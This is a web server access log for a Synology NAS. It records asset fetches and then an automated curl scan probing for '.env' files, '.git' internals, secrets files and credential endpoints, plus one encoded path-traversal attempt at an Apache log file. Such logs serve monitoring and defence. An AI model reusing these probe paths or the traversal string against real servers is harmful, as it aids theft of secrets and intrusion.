[Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/public/build/root.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/build/q-manifest.json" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 216.81.245.209] [Length 2831] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/remix.config.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/_astro/hoisted.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/build/qwik-loader.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/dist/solid.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 403 403 - GET https nas.profibot.hu "/.cache/page-ssr/routes/render-page.js" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 404 404 - GET https nas.profibot.hu "/public/page-data/app-data.json" [Client 216.81.245.209] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:17:21:26 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vue-router/vue-router.min.js?v=1648175353" [Client 216.81.245.209] [Length 9737] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:26 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/babel-polyfill/polyfill.js?v=1650348555" [Client 216.81.245.209] [Length 47694] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:26 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vue/vue.min.js?v=1633587521" [Client 216.81.245.209] [Length 33045] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:26 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vuex/vuex.min.js?v=1585722123" [Client 216.81.245.209] [Length 2978] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:26 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs&SynoToken=&v=1656670912" [Client 216.81.245.209] [Length 725] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:26 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vuex/vuex.min.js?v=1585722123.map" [Client 216.81.245.209] [Length 2978] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:27 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs&SynoToken=&v=1656670912.map" [Client 216.81.245.209] [Length 725] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:27 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vue-router/vue-router.min.js?v=1648175353.map" [Client 216.81.245.209] [Length 9737] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:27 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/babel-polyfill/polyfill.js?v=1650348555.map" [Client 216.81.245.209] [Length 47694] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:27 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vue/vue.min.js?v=1633587521.map" [Client 216.81.245.209] [Length 33045] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:27 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/dsm.taskbar.bundle.js?v=1661421011" [Client 216.81.245.209] [Length 32255] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:27 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/vendor.js?v=1654081517" [Client 216.81.245.209] [Length 19196] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:27 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/sds.js?v=1678269761" [Client 216.81.245.209] [Length 92855] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:27 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/vendor.js?v=1654081517.map" [Client 216.81.245.209] [Length 19196] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:27 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/sds.js?v=1678269761.map" [Client 216.81.245.209] [Length 92855] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:27 +0000] - 200 200 - GET https nas.profibot.hu "/webman/sds/dist/dsm.common.bundle.js?v=1661421011" [Client 216.81.245.209] [Length 19433] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:27 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/dsm.taskbar.bundle.js?v=1661421011.map" [Client 216.81.245.209] [Length 32255] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:27 +0000] - 200 200 - GET https nas.profibot.hu "/webman/desktop/dist/dsm.desktop.bundle.js?v=1661421011" [Client 216.81.245.209] [Length 22969] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:27 +0000] - 200 200 - GET https nas.profibot.hu "/webman/sds/dist/dsm.sds.bundle.js?v=1661421011" [Client 216.81.245.209] [Length 14204] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:27 +0000] - 200 200 - GET https nas.profibot.hu "/webman/desktop/dist/dsm.desktop.bundle.js?v=1661421011.map" [Client 216.81.245.209] [Length 22969] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:27 +0000] - 200 200 - GET https nas.profibot.hu "/webman/sds/dist/dsm.common.bundle.js?v=1661421011.map" [Client 216.81.245.209] [Length 19433] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/dsm.login.bundle.js?v=1661421011" [Client 216.81.245.209] [Length 8796] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/sds/dist/dsm.sds.bundle.js?v=1661421011.map" [Client 216.81.245.209] [Length 14204] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/entry/dist/dsm.entry.bundle.js?v=1661421011" [Client 216.81.245.209] [Length 783] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/dsm.login.bundle.js?v=1661421011.map" [Client 216.81.245.209] [Length 8796] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/synowebapi.js/synowebapi.min.js?v=1653287912" [Client 216.81.245.209] [Length 12470] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/syno-vue-components/syno-vue-components.min.js?v=1652869476" [Client 216.81.245.209] [Length 231162] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/synocredential.js/synocredential.min.js?v=1661507553" [Client 216.81.245.209] [Length 5114] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/entry/dist/dsm.entry.bundle.js?v=1661421011.map" [Client 216.81.245.209] [Length 783] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/synowebapi.js/synowebapi.min.js?v=1653287912.map" [Client 216.81.245.209] [Length 12470] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/synocredential.js/synocredential.min.js?v=1661507553.map" [Client 216.81.245.209] [Length 5114] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&v=1745258201" [Client 216.81.245.209] [Length 201] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.JSUIString&version=1&method=getjs&lang=hun&v=1665685189" [Client 216.81.245.209] [Length 4653] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/unsupported-browsers/dist/bundle.js?v=1661421011" [Client 216.81.245.209] [Length 889] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&v=1745258201.map" [Client 216.81.245.209] [Length 201] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.JSUIString&version=1&method=getjs&lang=hun&v=1665685189.map" [Client 216.81.245.209] [Length 4653] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/webman/unsupported-browsers/dist/bundle.js?v=1661421011.map" [Client 216.81.245.209] [Length 889] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/adapter/ext/ext-base.js?v=1650348555" [Client 216.81.245.209] [Length 12041] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:28 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/ux-all.js?v=1650348555" [Client 216.81.245.209] [Length 84444] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:29 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/adapter/ext/ext-base.js?v=1650348555.map" [Client 216.81.245.209] [Length 12041] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:29 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/scrollbar/flexcroll.js?v=1650348555" [Client 216.81.245.209] [Length 8293] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:29 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/scrollbar/flexcroll.js?v=1650348555.map" [Client 216.81.245.209] [Length 8293] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:29 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/noise-c.js?v=1650348555" [Client 216.81.245.209] [Length 5302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:29 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ext-all.js?v=1650348555" [Client 216.81.245.209] [Length 219382] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:29 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/noise-c.js?v=1650348555.map" [Client 216.81.245.209] [Length 5302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:30 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/ux-all.js?v=1650348555.map" [Client 216.81.245.209] [Length 84444] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:30 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/constants.js?v=1650348555" [Client 216.81.245.209] [Length 898] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:30 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/constants.js?v=1650348555.map" [Client 216.81.245.209] [Length 898] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:30 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/syno-vue-components/syno-vue-components.min.js?v=1652869476.map" [Client 216.81.245.209] [Length 231162] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:30 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/index.js?v=1650348555" [Client 216.81.245.209] [Length 4478] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:30 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/index.js?v=1650348555.map" [Client 216.81.245.209] [Length 4478] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:31 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/sodium.js?v=1650348555" [Client 216.81.245.209] [Length 248661] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:32 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ext-all.js?v=1650348555.map" [Client 216.81.245.209] [Length 219382] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:32 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725" [Client 216.81.245.209] [Length 585568] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:33 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/sodium.js?v=1650348555.map" [Client 216.81.245.209] [Length 248661] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:17:21:35 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725.map" [Client 216.81.245.209] [Length 585660] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:21:41:55 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 204.76.203.25] [Length 12685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[21/Jan/2026:01:24:00 +0000] - - 301 - POST http nas.profibot.hu "/" [Client 185.177.72.49] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:01:24:00 +0000] - - 301 - GET http nas.profibot.hu "/.env" [Client 185.177.72.49] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:00 +0000] - 403 403 - GET https nas.profibot.hu "/.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:00 +0000] - 403 403 - GET https nas.profibot.hu "/.env.example" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:00 +0000] - 403 403 - GET https nas.profibot.hu "/backend/.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:00 +0000] - 403 403 - GET https nas.profibot.hu "/api/.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:00 +0000] - 403 403 - GET https nas.profibot.hu "/laravel/.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:00 +0000] - 404 404 - GET https nas.profibot.hu "/env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:00 +0000] - 404 404 - GET https nas.profibot.hu "/sendgrid.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:00 +0000] - 403 403 - GET https nas.profibot.hu "/app/.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 185.177.72.49] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 403 403 - GET https nas.profibot.hu "/.env.testing" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 403 403 - GET https nas.profibot.hu "/..%5c..%5c..%5c..%5c..%5c..%5cvar/log/apache2/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 404 404 - GET https nas.profibot.hu "/admin.html" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 403 403 - GET https nas.profibot.hu "/.env.development" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/debug.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 404 404 - GET https nas.profibot.hu "/test" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 403 403 - GET https nas.profibot.hu "/.env.production" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 404 404 - GET https nas.profibot.hu "/oauth/authorize" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 404 404 - GET https nas.profibot.hu "/_profiler/phpinfo" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 403 403 - GET https nas.profibot.hu "/.env.test" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 404 404 - GET https nas.profibot.hu "/api/login" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 404 404 - GET https nas.profibot.hu "/error/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 404 404 - GET https nas.profibot.hu "/config/secrets.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 404 404 - GET https nas.profibot.hu "/api/credentials" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 403 403 - GET https nas.profibot.hu "/.env.local" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 403 403 - GET https nas.profibot.hu "/.env.prod" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 404 404 - GET https nas.profibot.hu "/wp-config.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 404 404 - GET https nas.profibot.hu "/controlpanel" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 404 404 - GET https nas.profibot.hu "/api/user" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 403 403 - GET https nas.profibot.hu "/.cache" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:01 +0000] - 403 403 - GET https nas.profibot.hu "/.git" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/HEAD" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/index" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/logs/HEAD" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/logs/refs/heads/master" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/logs/refs/heads/main" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/logs/refs/remotes/origin/master" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/logs/refs/remotes/origin/main" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/hooks" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/info/exclude" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/refs/heads/master" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/refs/heads/main" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/refs/remotes/origin/HEAD" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/packed-refs" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/objects" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/COMMIT_EDITMSG" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/description" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/FETCH_HEAD" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.git/ORIG_HEAD" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.github" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.github/workflows" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.github/workflows/main.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.github/workflows/ci.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.github/dependabot.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.github/CODEOWNERS" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.github/ISSUE_TEMPLATE" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.github/PULL_REQUEST_TEMPLATE.md" [Client 185.177.72.49] [Length 8467] 